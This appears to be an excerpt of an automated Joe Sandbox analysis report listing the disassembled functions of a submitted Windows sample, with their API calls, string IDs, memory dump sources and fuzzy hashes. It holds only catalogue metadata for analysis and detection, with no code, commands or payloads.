                                Function 00CC9C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CC9C68
                                • CreateMenu.USER32 ref: 00CC9C83
                                • SetMenu.USER32(?,00000000), ref: 00CC9C92
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC9D1F
                                • IsMenu.USER32(?), ref: 00CC9D35
                                • CreatePopupMenu.USER32 ref: 00CC9D3F
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC9D70
                                • DrawMenuBar.USER32 ref: 00CC9D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                • String ID: 0
                                • API String ID: 176399719-4108050209
                                • Opcode ID: 66fac5a15860f9f9098baedd59236be0c9c54df4681f1a47271770d4e2645439
                                • Instruction ID: cf14826744fd1b95ee71d6d9ef909e9d0c62fe2b774446261c6fc74671a164a4
                                • Opcode Fuzzy Hash: 66fac5a15860f9f9098baedd59236be0c9c54df4681f1a47271770d4e2645439
                                • Instruction Fuzzy Hash: 6D414A79A01209EFDB20EF64D888FDABBB5FF49314F144418E956AB351D730AA10DFA0
                                Function 00CAEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00CAEC1E
                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CAEC94
                                • GetLastError.KERNEL32 ref: 00CAEC9E
                                • SetErrorMode.KERNEL32(00000000,READY), ref: 00CAED0B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Error$Mode$DiskFreeLastSpace
                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                • API String ID: 4194297153-14809454
                                • Opcode ID: 80234885949d013449e45f8371cf2bbdecd618e9181b0af4b32365f5e4edc20c
                                • Instruction ID: 9272910b6632913c867bfda34f8988b5061caa84287c9a9c577119c15c4af43e
                                • Opcode Fuzzy Hash: 80234885949d013449e45f8371cf2bbdecd618e9181b0af4b32365f5e4edc20c
                                • Instruction Fuzzy Hash: F431C135A0020AAFC710EF68D985ABEB7B5FF46728F104026F512EB291DA719E41DBD1
                                Function 00C9C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C9C782
                                • GetDlgCtrlID.USER32 ref: 00C9C78D
                                • GetParent.USER32 ref: 00C9C7A9
                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C9C7AC
                                • GetDlgCtrlID.USER32(?), ref: 00C9C7B5
                                • GetParent.USER32(?), ref: 00C9C7D1
                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C9C7D4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$CtrlParent$_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 313823418-1403004172
                                • Opcode ID: ed6f797369c3fb6754066c9ca576062e9d88227fee4687c8d598c270420f2658
                                • Instruction ID: af119f137d363e6c561af38faa09408ec6ad7fdf1b61dad17193cbd058057de4
                                • Opcode Fuzzy Hash: ed6f797369c3fb6754066c9ca576062e9d88227fee4687c8d598c270420f2658
                                • Instruction Fuzzy Hash: BF219D74A00208BFDF05EBA4CCC9EBEBBA9EF49310F104115F562972E1DB75595AEB20
                                Function 00C9C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C9C869
                                • GetDlgCtrlID.USER32 ref: 00C9C874
                                • GetParent.USER32 ref: 00C9C890
                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C9C893
                                • GetDlgCtrlID.USER32(?), ref: 00C9C89C
                                • GetParent.USER32(?), ref: 00C9C8B8
                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C9C8BB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$CtrlParent$_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 313823418-1403004172
                                • Opcode ID: 467a645887d104cc25b9efd051b086f813e81eb46b0a89aff6e7140bf77ec211
                                • Instruction ID: 84bf351f77bc9d2f907a231a7cca5d59d5d4833ea104eba08de3c348cfd5c6fe
                                • Opcode Fuzzy Hash: 467a645887d104cc25b9efd051b086f813e81eb46b0a89aff6e7140bf77ec211
                                • Instruction Fuzzy Hash: D1219071940208BFDF00ABA4CCC9FFEB7A9EF49300F100515F562A71E1DB759959AB20
                                Function 00C9C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32 ref: 00C9C8D9
                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00C9C8EE
                                • _wcscmp.LIBCMT ref: 00C9C900
                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C9C97B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClassMessageNameParentSend_wcscmp
                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                • API String ID: 1704125052-3381328864
                                • Opcode ID: 9747c662592b2a5d594749103ae2278411e5c7391d6c13b5ee9997b6d4c722f6
                                • Instruction ID: ce358be34cc35d1840209df527ecb871f46883328d8f2a953c61bc9d15c25c9a
                                • Opcode Fuzzy Hash: 9747c662592b2a5d594749103ae2278411e5c7391d6c13b5ee9997b6d4c722f6
                                • Instruction Fuzzy Hash: F711C676648342BEFE043B31EC8EDBA77DCDF06764B210012F921E90D2FF6269625664
                                Function 00CBB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 00CBB777
                                • CoInitialize.OLE32(00000000), ref: 00CBB7A4
                                • CoUninitialize.OLE32 ref: 00CBB7AE
                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00CBB8AE
                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CBB9DB
                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00CBBA0F
                                • CoGetObject.OLE32(?,00000000,00CED91C,?), ref: 00CBBA32
                                • SetErrorMode.KERNEL32(00000000), ref: 00CBBA45
                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CBBAC5
                                • VariantClear.OLEAUT32(00CED91C), ref: 00CBBAD5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                • String ID:
                                • API String ID: 2395222682-0
                                • Opcode ID: 2222241d8cd8e81f3e6cc033d778faba6e887b6a4ac5807d4f8cb7aa35a0b0a0
                                • Instruction ID: 62ec3827806daa65c0d6caa44d2bef49a7fe456c63de71c891f00d93291bb8e2
                                • Opcode Fuzzy Hash: 2222241d8cd8e81f3e6cc033d778faba6e887b6a4ac5807d4f8cb7aa35a0b0a0
                                • Instruction Fuzzy Hash: A1C12471608345AFC700DF69C884A6BB7E9FF88304F04495DF59A9B251DB71ED05CB92
                                Function 00CAB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                Download Yara Rule
                                APIs
                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00CAB137
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ArraySafeVartype
                                • String ID:
                                • API String ID: 1725837607-0
                                • Opcode ID: f4aff5c91b79cda909ea75a629396845bfd08ea37cbecf8ecdf7dfc9b1a0bb69
                                • Instruction ID: c527cc96cc8559f967b194b395aa02701dbf7acf95c8fa2aaf5aa5cffb513a0e
                                • Opcode Fuzzy Hash: f4aff5c91b79cda909ea75a629396845bfd08ea37cbecf8ecdf7dfc9b1a0bb69
                                • Instruction Fuzzy Hash: 60C1827590121ADFDB00CF98D495BAEB7F4FF0A319F20406AE615EB252C734AE81DB90
                                Function 00C8BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                Download Yara Rule
                                APIs
                                • __lock.LIBCMT ref: 00C8BA74
                                  • Part of subcall function 00C88984: __mtinitlocknum.LIBCMT ref: 00C88996
                                  • Part of subcall function 00C88984: EnterCriticalSection.KERNEL32(00C80127,?,00C8876D,0000000D), ref: 00C889AF
                                • __calloc_crt.LIBCMT ref: 00C8BA85
                                  • Part of subcall function 00C87616: __calloc_impl.LIBCMT ref: 00C87625
                                  • Part of subcall function 00C87616: Sleep.KERNEL32(00000000,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C8763C
                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00C8BAA0
                                • GetStartupInfoW.KERNEL32(?,00D16990,00000064,00C86B14,00D167D8,00000014), ref: 00C8BAF9
                                • __calloc_crt.LIBCMT ref: 00C8BB44
                                • GetFileType.KERNEL32(00000001), ref: 00C8BB8B
                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00C8BBC4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                • String ID:
                                • API String ID: 1426640281-0
                                • Opcode ID: a6f334cc6a3d397be5341050ac96f79a19aa9ab39b6b68cc2ac098ca90d3aea4
                                • Instruction ID: 9e7c9b69aeb89713901122ccb1e4edacef97119255ca2d53ea093cd679abb33f
                                • Opcode Fuzzy Hash: a6f334cc6a3d397be5341050ac96f79a19aa9ab39b6b68cc2ac098ca90d3aea4
                                • Instruction Fuzzy Hash: 1281D4709047458FDB24EF68C8806ADBBF0AF59328B24425DD4B6AB3D1DB349D43DB68
                                Function 00CA7212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                Download Yara Rule
                                APIs
                                • __swprintf.LIBCMT ref: 00CA7226
                                • __swprintf.LIBCMT ref: 00CA7233
                                  • Part of subcall function 00C8234B: __woutput_l.LIBCMT ref: 00C823A4
                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CA725D
                                • LoadResource.KERNEL32(?,00000000), ref: 00CA7269
                                • LockResource.KERNEL32(00000000), ref: 00CA7276
                                • FindResourceW.KERNEL32(?,?,00000003), ref: 00CA7296
                                • LoadResource.KERNEL32(?,00000000), ref: 00CA72A8
                                • SizeofResource.KERNEL32(?,00000000), ref: 00CA72B7
                                • LockResource.KERNEL32(?), ref: 00CA72C3
                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CA7322
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                • String ID:
                                • API String ID: 1433390588-0
                                • Opcode ID: bb7ade678b6f54c0ce1f7e33e57a8a8b70e7121340117bdad3f05aeab7d82c85
                                • Instruction ID: 9e986a3cc3ed30954bf99913ba0dec37c95ee19425a5d6b88b3f508a77b77456
                                • Opcode Fuzzy Hash: bb7ade678b6f54c0ce1f7e33e57a8a8b70e7121340117bdad3f05aeab7d82c85
                                • Instruction Fuzzy Hash: 9E31AEB190525BABDF119F609C88BAF7BACFF05304B004625FD12D6160E734DA51DBB0
                                Function 00CA4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 00CA4A7D
                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4A91
                                • GetWindowThreadProcessId.USER32(00000000), ref: 00CA4A98
                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4AA7
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CA4AB9
                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4AD2
                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4AE4
                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4B29
                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4B3E
                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00CA3AD7,?,00000001), ref: 00CA4B49
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                • String ID:
                                • API String ID: 2156557900-0
                                • Opcode ID: 0cfb198c2b6a1f414c1a1169d2fc16865ea0dee0c06ceabe6f9053750f714ea5
                                • Instruction ID: b6ed39984c45881b4b813937fd0b7d557e2875ee3bd35d2b67a4a18c49c01f9c
                                • Opcode Fuzzy Hash: 0cfb198c2b6a1f414c1a1169d2fc16865ea0dee0c06ceabe6f9053750f714ea5
                                • Instruction Fuzzy Hash: FB31BD71600706EFDB249B14EC88B6EB7AEABA2316F114505F915CB2A0D3F8DE458B70
                                Function 00CDEC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetClientRect.USER32(?), ref: 00CDEC32
                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00CDEC49
                                • GetWindowDC.USER32(?), ref: 00CDEC55
                                • GetPixel.GDI32(00000000,?,?), ref: 00CDEC64
                                • ReleaseDC.USER32(?,00000000), ref: 00CDEC76
                                • GetSysColor.USER32(00000005), ref: 00CDEC94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                • String ID:
                                • API String ID: 272304278-0
                                • Opcode ID: 43e64a09254ed521ded5f94db75a25b590077305e3497cfb5cc3111ebad9af75
                                • Instruction ID: 0f99ad86c394b0468ad9210504009e6928012013485d789fd619bff1139aa06c
                                • Opcode Fuzzy Hash: 43e64a09254ed521ded5f94db75a25b590077305e3497cfb5cc3111ebad9af75
                                • Instruction Fuzzy Hash: 0E212C71500245EFDB21AB64EC89BAE7B75FB45321F108265FA2BA91E1DB310E41DF21
                                Function 00C9D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                Download Yara Rule
                                APIs
                                • EnumChildWindows.USER32(?,00C9DD46), ref: 00C9DC86
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ChildEnumWindows
                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                • API String ID: 3555792229-1603158881
                                • Opcode ID: 0668f4b555f8e868076201d5b4ff0df5374c4aa71b18c6a27bd1fd5c9ed9a52b
                                • Instruction ID: 6c032f38fedbb76245afa37a370507514d30fa3954e9974cc576462e0aebde5c
                                • Opcode Fuzzy Hash: 0668f4b555f8e868076201d5b4ff0df5374c4aa71b18c6a27bd1fd5c9ed9a52b
                                • Instruction Fuzzy Hash: 4E91A370A00506ABCF08EF64C4C5BE9FB75BF05350F548119E85BB7291DF306A9AEBA1
                                Function 00C645A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                Download Yara Rule
                                APIs
                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C645F0
                                • CoUninitialize.OLE32(?,00000000), ref: 00C64695
                                • UnregisterHotKey.USER32(?), ref: 00C647BD
                                • DestroyWindow.USER32(?), ref: 00CD5936
                                • FreeLibrary.KERNEL32(?), ref: 00CD599D
                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CD59CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                • String ID: close all
                                • API String ID: 469580280-3243417748
                                • Opcode ID: 5535d59f7864c7e1a9d68babef027e299fb376e9c553bc07fc74134d47fba9af
                                • Instruction ID: ed1a9f4d614e6f634151059dc896aa220f08703a1003eed9acb5272972721657
                                • Opcode Fuzzy Hash: 5535d59f7864c7e1a9d68babef027e299fb376e9c553bc07fc74134d47fba9af
                                • Instruction Fuzzy Hash: 56911934600602DFC729EF24C8E5B68F3A4FF15715F6042A9E51AA7262DB30AE66DF14
                                Function 00C7C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                Download Yara Rule
                                APIs
                                • SetWindowLongW.USER32(?,000000EB), ref: 00C7C2D2
                                  • Part of subcall function 00C7C697: GetClientRect.USER32(?,?), ref: 00C7C6C0
                                  • Part of subcall function 00C7C697: GetWindowRect.USER32(?,?), ref: 00C7C701
                                  • Part of subcall function 00C7C697: ScreenToClient.USER32(?,?), ref: 00C7C729
                                • GetDC.USER32 ref: 00CDE006
                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00CDE019
                                • SelectObject.GDI32(00000000,00000000), ref: 00CDE027
                                • SelectObject.GDI32(00000000,00000000), ref: 00CDE03C
                                • ReleaseDC.USER32(?,00000000), ref: 00CDE044
                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00CDE0CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                • String ID: U
                                • API String ID: 4009187628-3372436214
                                • Opcode ID: 15308053fe7118927250cfa153cec163c313ac128e691423f11e1a8c341a7ad1
                                • Instruction ID: a2b7aaa57aa01b53c214173b0f2240de56d04f32738a9bfc69cfaedc3b54e18e
                                • Opcode Fuzzy Hash: 15308053fe7118927250cfa153cec163c313ac128e691423f11e1a8c341a7ad1
                                • Instruction Fuzzy Hash: A371E631500205EFCF21AFA4CCC0AAE7BB5FF55350F14826AFE665A2A6C7319D41EB61
                                Function 00CCEAA6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                  • Part of subcall function 00C7B736: GetCursorPos.USER32(000000FF), ref: 00C7B749
                                  • Part of subcall function 00C7B736: ScreenToClient.USER32(00000000,000000FF), ref: 00C7B766
                                  • Part of subcall function 00C7B736: GetAsyncKeyState.USER32(00000001), ref: 00C7B78B
                                  • Part of subcall function 00C7B736: GetAsyncKeyState.USER32(00000002), ref: 00C7B799
